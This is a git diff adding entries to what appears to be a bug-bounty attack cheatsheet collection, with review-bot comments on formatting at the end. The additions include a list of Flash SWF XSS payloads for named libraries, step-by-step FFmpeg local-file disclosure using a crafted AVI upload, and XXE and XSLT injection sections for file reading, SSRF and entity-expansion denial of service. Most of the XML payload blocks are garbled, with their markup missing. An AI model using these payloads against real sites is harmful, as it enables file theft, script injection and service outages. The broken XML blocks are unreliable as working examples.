diff --git a/README.md b/README.md index fb7d14c..921f75d 100644 --- a/README.md +++ b/README.md @@ -10,11 +10,13 @@ - [CRLF Injection || HTTP Response Splitting](cheatsheets/crlf.md) - [CSV Injection](cheatsheets/csv-injection.md) - [LFI](cheatsheets/lfi.md) +- [XXE](cheatsheets/xxe.md) - [RCE](cheatsheets/rce.md) - [Open Redirect](cheatsheets/open-redirect.md) - [Crypto](cheatsheets/crypto.md) - [Template Injection](cheatsheets/template-injection.md) - [Content Injection](cheatsheets/content-injection.md) +- [XSLT Injection](cheatsheets/xslt.md) # Contributing @@ -49,3 +51,5 @@ We like to keep our Markdown files as uniform as possible. So if you submit a PR - [jon_bottarini](https://github.com/BlueTower) - [sp1d3r](https://github.com/sp1d3r) - [yasinS](https://github.com/yasinS) +- [neutrinoguy](https://github.com/neutrinoguy) +- [kuromatae](https://github.com/kuromatae) diff --git a/cheatsheets/bugbountyplatforms.md b/cheatsheets/bugbountyplatforms.md index 82a89f4..52f0e09 100644 --- a/cheatsheets/bugbountyplatforms.md +++ b/cheatsheets/bugbountyplatforms.md @@ -8,3 +8,4 @@ - [BountyFactory](https://bountyfactory.io/) - [Intigriti](https://intigriti.be/) - [Bugbountyjp](https://bugbounty.jp/) +- [Yogosha](https://www.yogosha.com/) diff --git a/cheatsheets/lfi.md b/cheatsheets/lfi.md index 36c0501..4233520 100644 --- a/cheatsheets/lfi.md +++ b/cheatsheets/lfi.md 
@@ -21,3 +21,17 @@ ``` /%5c.. ``` + +**FFmpeg Local File Disclosure** + +This [script](https://github.com/neex/ffmpeg-avi-m3u-xbin/blob/master/gen_xbin_avi.py) by @neex can be used to disclose local files on FFmpeg hosts which parse externally-referencing [HLS playlists](https://ffmpeg.org/ffmpeg-formats.html#hls-2). + +_Steps to reproduce_ + +1. Please download the script from @neex to your "attacker" instance +2. Execute the script with your desired parameters: `python3 gen_xbin_avi.py file:///etc/hostname bugbounty.avi` +3. Upload the generated AVI file to your target site (e.g. within a 'video upload page') +4. The target may process the malicious HLS inclusion with FFmpeg on the server-side. +5. Play the uploaded AVI via the target site. If successful, your desired file will be disclosed within the video. + +Alternative scripts exist which may generate different HLS formats or lead to the desired file being disclosed in a different manner. diff --git a/cheatsheets/special-tools.md b/cheatsheets/special-tools.md index c45896e..a354f6a 100644 --- a/cheatsheets/special-tools.md +++ b/cheatsheets/special-tools.md @@ -30,7 +30,14 @@ otherapp.10.0.0.1.nip.io **Reconnaissance** +- https://dnsdumpster.com (DNS and subdomain recon) +- http://threatcrowd.org (WHOIS, DNS, email, and subdomain recon) +- https://mxtoolbox.com (wide range of DNS-related recon tools) - https://publicwww.com/ (Source Code Search Engine) +- [HackerTarget Tools](https://hackertarget.com/ip-tools/) (DNS recon, site lookup, and scanning tools) +- [VirusTotal](https://virustotal.com/en-gb/domain/google.com/information/) (WHOIS, DNS, and subdomain recon) +- [crt.sh](https://crt.sh/?q=%25.uber.com) (SSL certificate search) +- [Google CT](https://transparencyreport.google.com/https/certificates) (SSL certificate transparency search) **Report Templates** diff --git a/cheatsheets/xslt.md b/cheatsheets/xslt.md new file mode 100644 index 0000000..5fb2a1d --- /dev/null +++ b/cheatsheets/xslt.md 
@@ -0,0 +1,25 @@ +## XSLT Injection + +**Backend infos** + +```xml + + + + xsl:vendor =
+ xsl:version =
+ + +``` + +**Injecting in PHP** + +```xml + + + + + + +``` + diff --git a/cheatsheets/xss.md b/cheatsheets/xss.md index e62354b..9fd8b26 100644 --- a/cheatsheets/xss.md +++ b/cheatsheets/xss.md @@ -110,6 +110,34 @@ javas cript://www.google.com/%0Aalert(1) [a](javascript:window.onerror=confirm;throw%201) ``` +**Flash SWF XSS** + +- ZeroClipboard: `ZeroClipboard.swf?id=\"))}catch(e){confirm(/XSS./.source);}//&width=500&height=500&.swf` + +- plUpload Player: `plupload.flash.swf?%#target%g=alert&uid%g=XSS&` + +- plUpload MoxiePlayer: `Moxie.swf?target%g=confirm&uid%g=XSS` (also works with `Moxie.cdn.swf` and other variants) + +- FlashMediaElement: flashmediaelement.swf?jsinitfunctio%gn=alert`1` + +- videoJS: `video-js.swf?readyFunction=alert%28document.domain%2b'%20XSS'%29` + +- YUI "io.swf": `io.swf?yid=\"));}catch(e){alert(document.domain);}//` + +- YUI "uploader.swf": `uploader.swf?allowedDomain=\%22}%29%29%29}catch%28e%29{alert%28document.domain%29;}//<` + +- Open Flash Chart: `open-flash-chart.swf?get-data=(function(){alert(1)})()` + +- Banner.swf (generic): `banner.swf?clickTAG=javascript:alert(document.domain);//` + +- JWPlayer (legacy): `player.swf?playerready=alert(document.domain)` and `/player.swf?tracecall=alert(document.domain)` + +- SWFUpload 2.2.0.1: `swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!confirm(1);//` + +- FlowPlayer 3.2.7: `flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf` + +_Note: Useful reference on SWF XSS construction from [MWR Labs](https://labs.mwrinfosecurity.com/blog/popping-alert1-in-flash/)._ + **Lightweight Markup Languages** **RubyDoc** (.rdoc) diff --git a/cheatsheets/xxe.md b/cheatsheets/xxe.md new file mode 100644 index 0000000..49ea531 --- /dev/null +++ b/cheatsheets/xxe.md 
@@ -0,0 +1,59 @@ +**LFI Test** +``` + + +]>&xxe; +``` + +**Blind LFI test (when first case doesn't return anything)** +``` + + + +]>&blind; +``` + +**Access Control bypass (loading restricted resources - PHP example)** +``` + +]> + +``` + +**SSRF Test** +``` + + +]>&xxe; +``` + +**XEE (XML Entity Expansion - DOS)** +``` + + + + + + + + + + + + +]> +&lol9; +``` + +**XEE #2 (Remote attack - through external xml inclusion)** +``` + +]> +3..2..1...&test +```
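Review bot: in the README cheatsheet list, the two new entries land in different places (XXE between LFI and RCE, XSLT Injection at the end after Content Injection); since both are XML-processing injections, placing XSLT Injection directly after XXE would keep related sheets together and makes the list easier to scan.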
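Review bot: the FFmpeg section in lfi.md never states the precondition it depends on, namely that the target invokes FFmpeg server-side on user-supplied media with the HLS demuxer and file: protocol access enabled (the linked description says "FFmpeg hosts which parse externally-referencing HLS playlists", and the example uses `file:///etc/hostname`); add that as a one-line prerequisite above the steps so a reader can distinguish a non-vulnerable deployment (FFmpeg run with a restricted protocol whitelist) from a failed upload. Step 1, "Please download the script from @neex", reads as a request rather than a reproduction step; drop "Please". The closing sentence "Alternative scripts exist which may generate different HLS formats..." is vague without a name or link and should either be made concrete or removed.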
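Review bot: the new Reconnaissance entries in special-tools.md mix two link styles in one list, three bare URLs (dnsdumpster, threatcrowd, mxtoolbox) beside markdown-linked entries such as `[HackerTarget Tools](...)`, and the README asks for uniform markdown; pick one form. Two links also embed named third-party domains as query targets (`https://virustotal.com/en-gb/domain/google.com/information/` and `https://crt.sh/?q=%25.uber.com`); link the tool's landing page or use a placeholder domain so the cheatsheet does not point readers at specific companies. threatcrowd.org is the only entry linked over plain http while the rest use https.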
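Review bot: xslt.md is the only new file in this PR that opens with a markdown heading (`## XSLT Injection`); xxe.md uses bold section labels only, so the two new sheets should share one convention. "Backend infos" should read "Backend info". The "Injecting in PHP" block carries no sentence saying what the stylesheet does or what output indicates success, unlike the FFmpeg addition in lfi.md; one line stating the expected result would make the entry usable for triage.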
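Review bot: in the Flash SWF XSS list in xss.md, the FlashMediaElement entry is the only item whose payload is not wrapped in inline-code delimiters, and the payload itself contains backticks (alert`1`), so it will render incorrectly; wrap it in double backticks. The items are separated by blank lines, which renders as a loose list; remove the blank lines. Consider also prefacing the list with a sentence that these are legacy SWF files and that the reportable condition is such a file still being hosted, since the payloads only fire where Flash is still enabled.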
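Review bot: the code fences in xxe.md are untagged while xslt.md tags its fences as xml; tag these too for uniform rendering. The "XEE (XML Entity Expansion - DOS)" entry is a resource-exhaustion payload (the `&lol9;` expansion chain), and the sheet should note next to it that parsers with entity-expansion limits reject it outright, so "no effect" is not evidence the parser is safe and the test should be sized to the target rather than run at full depth. "Blind LFI test (when first case doesn't return anything)" would be clearer as "Blind XXE test", since it is the out-of-band variant of the section above it rather than an LFI.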